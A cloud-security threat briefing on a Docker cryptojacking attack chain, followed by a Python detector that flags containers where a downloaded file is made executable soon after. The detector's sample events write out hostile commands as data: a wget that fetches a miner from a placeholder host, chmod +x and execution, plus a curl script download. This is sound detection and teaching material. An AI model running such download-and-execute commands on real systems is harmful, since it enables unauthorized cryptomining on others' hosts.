InsideADockerCrypto_Whitepaper_Final

Issue link: https://resources.threatstack.com/i/1054718


CLOUD SECURITY THREAT BRIEFING

Inside a Docker Cryptojacking Exploit

Containers are useful tools for managing the application development-deployment lifecycle, but they are not a security tool. Docker builds on lower-level features of the host operating system that define which processes can see each other, and which compute resources they can each access. But containers are still sharing host resources underneath, and higher up the stack complications can arise from the privileges and configuration parameters operators (or, potentially, bad actors) use to launch containers at runtime. Like adopting any new tool, it's a balancing act between addressing security considerations and moving fast.

The Threat Stack Cloud Security Platform® provides high-fidelity security signals for observing operator behavior on infrastructure running across your environment — from host servers, containers, orchestration, and their admin control planes. In addition to our customer onboarding process, we offer ongoing services in the form of the Threat Stack Cloud SecOps Program℠, where analysts in our Security Operations Center (SOC) triage alerts and investigate security events on customers' behalf.

The Threat Stack SOC gives us a unique perspective on trending exploits in the field. One trend we are seeing more and more of is around cryptojacking and is outlined below in a set of anonymized adversarial behaviors.

Stepping Through the Attack

STEP 1: Identify a website vulnerable to remote code injection

The command is sent through the application layer, typically sending the malicious code by manipulating a text field on a website or an API endpoint exposed in the site's URL — or by probing an embedded shell console commonly found on code reference websites.

STEP 2: Launch container and the injected code runs inside it

The injected code filters down to the operating system and is translated to the container environment on the back end. The back end spins up the container and prepares to execute the injected code. In the recent trends observed by Threat Stack SOC analysts, attackers then pass commands directly to the shell within a Docker container. While restricted to the container's reduced view of the host operating system, the attacker can now arbitrarily run untrusted code.

The following series of events occurred all within seconds of each other, and were monitored in near-real-time by analysts in our SOC. The speed of these transactions indicates a scripted attack versus a hands-on-keyboard approach.

STEP 3: Download the cryptomining executable to the local filesystem

The first step was to run a wget command to download the cryptomining executable, CNRig.

THREAT STACK ALERT: Possible data download is a user behavior that typically triggers a Sev 2 alert in Threat Stack.

STEP 4: Modify permissions, chmod +x

Here, the attacker changes permissions on the CNRig executable, gaining the ability to run this file without additional authentication. In containers that are normally designed to run as immutable components in a microservices architecture, this event is a strong signal that something is wrong and a good candidate for alerting in Threat Stack.

THREAT STACK EVENT: An operator changing permissions at runtime is an important security event to observe, adding context to digital forensics that our analysts used to trace the path of this exploit.
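The download-then-chmod sequence in steps 3 and 4 is exactly the kind of signal a detection rule can correlate rather than alert on in isolation. The following is an added example, not Threat Stack's own alert logic or event schema: a small Python correlator over constructed container process-execution events (the field names ts, container and argv, and the sample records themselves, are assumptions made for this example) that flags a chmod granting execute permission on a file which wget or curl wrote into the same container within a short time window.

```python
"""Correlate container process events to flag "download, then chmod +x".

Added example; not Threat Stack's product code or event format. The event
records below are constructed for illustration, and the field names
(ts, container, argv) are an assumption, not a real product schema.
"""
import os
import shlex
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events. Container api-c31b performs the download ->
# chmod +x -> execute sequence within seconds; web-7f2a only runs ordinary
# commands; build-9d0e downloads a file but sets it executable much later.
# The host "placeholder.invalid" is a reserved, non-resolving placeholder.
SAMPLE_EVENTS = [
    {"ts": "2019-03-01T10:00:00", "container": "web-7f2a",
     "argv": ["nginx", "-g", "daemon off;"]},
    {"ts": "2019-03-01T10:00:02", "container": "api-c31b",
     "argv": ["/bin/sh", "-c", "wget http://placeholder.invalid/cnrig -O /tmp/cnrig"]},
    {"ts": "2019-03-01T10:00:04", "container": "api-c31b",
     "argv": ["chmod", "+x", "/tmp/cnrig"]},
    {"ts": "2019-03-01T10:00:05", "container": "api-c31b",
     "argv": ["/tmp/cnrig"]},
    {"ts": "2019-03-01T10:30:00", "container": "web-7f2a",
     "argv": ["chmod", "644", "/etc/nginx/nginx.conf"]},
    {"ts": "2019-03-01T11:00:00", "container": "build-9d0e",
     "argv": ["curl", "-sSL", "http://placeholder.invalid/script.sh", "-o", "/tmp/s.sh"]},
    {"ts": "2019-03-01T11:20:00", "container": "build-9d0e",
     "argv": ["chmod", "+x", "/tmp/s.sh"]},
]


def _unwrap_shell(argv):
    """If argv is `sh -c '<cmd>'`, return the inner command's argv instead."""
    if (len(argv) >= 3 and os.path.basename(argv[0]) in ("sh", "bash", "dash")
            and argv[1] == "-c"):
        return shlex.split(argv[2])
    return argv


def downloaded_path(argv):
    """Return the local path a wget/curl invocation writes to, or None.

    Handles `wget -O path`, `curl -o path`, and wget's default of saving
    under the URL's basename in the current directory (cwd is unknown here,
    so only the basename is returned in that case).
    """
    argv = _unwrap_shell(argv)
    if not argv:
        return None
    tool = os.path.basename(argv[0])
    flag = {"wget": "-O", "curl": "-o"}.get(tool)
    if flag is None:
        return None
    if flag in argv:
        i = argv.index(flag)
        if i + 1 < len(argv):
            return argv[i + 1]
    if tool == "wget":
        for arg in argv[1:]:
            if arg.startswith(("http://", "https://", "ftp://")):
                return arg.rstrip("/").rsplit("/", 1)[-1] or None
    return None  # curl without -o writes to stdout, not a file


def chmod_adds_execute(argv):
    """Return the target paths if argv is a chmod that grants execute, else None."""
    argv = _unwrap_shell(argv)
    if len(argv) < 3 or os.path.basename(argv[0]) != "chmod":
        return None
    rest = [a for a in argv[1:]
            if a not in ("-R", "-v", "-c", "-f") and not a.startswith("--")]
    if len(rest) < 2:
        return None
    mode, targets = rest[0], rest[1:]
    if mode.isdigit():
        grants = bool(int(mode[-3:], 8) & 0o111)   # octal: any x bit set (0755, 777, ...)
    else:
        # symbolic: any clause that adds (+) or sets (=) a permission containing x/X
        grants = any(("x" in c.split(op, 1)[1] or "X" in c.split(op, 1)[1])
                     for c in mode.split(",") for op in ("+", "=") if op in c)
    return targets if grants else None


def find_download_then_chmod(events, window_seconds=60):
    """Per container, flag a chmod granting execute on a file that wget/curl
    wrote in that same container no more than window_seconds earlier."""
    recent = defaultdict(dict)   # container -> {basename: download timestamp}
    findings = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts = datetime.fromisoformat(ev["ts"])
        ctr = ev["container"]
        path = downloaded_path(ev["argv"])
        if path:
            recent[ctr][os.path.basename(path)] = ts
            continue
        for target in chmod_adds_execute(ev["argv"]) or []:
            dl_ts = recent[ctr].get(os.path.basename(target))
            if dl_ts is not None and ts - dl_ts <= timedelta(seconds=window_seconds):
                findings.append({"container": ctr, "path": target,
                                 "seconds_after_download": (ts - dl_ts).total_seconds()})
    return findings


if __name__ == "__main__":
    for hit in find_download_then_chmod(SAMPLE_EVENTS):
        print(f"ALERT container={hit['container']} path={hit['path']} "
              f"chmod +x {hit['seconds_after_download']:.0f}s after download")
```

With the default 60-second window only api-c31b is flagged, matching the page's point that the speed of the sequence is itself the tell; widening the window to an hour also surfaces build-9d0e, which is the trade-off between catching slower hands-on-keyboard activity and tolerating legitimate build steps. In a real deployment the events would come from the host's process-execution or audit telemetry with a container identifier attached, and the download path matching shown here is deliberately approximate (basename only), so treat it as a correlation hint to enrich an alert, not as the alert's sole condition.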
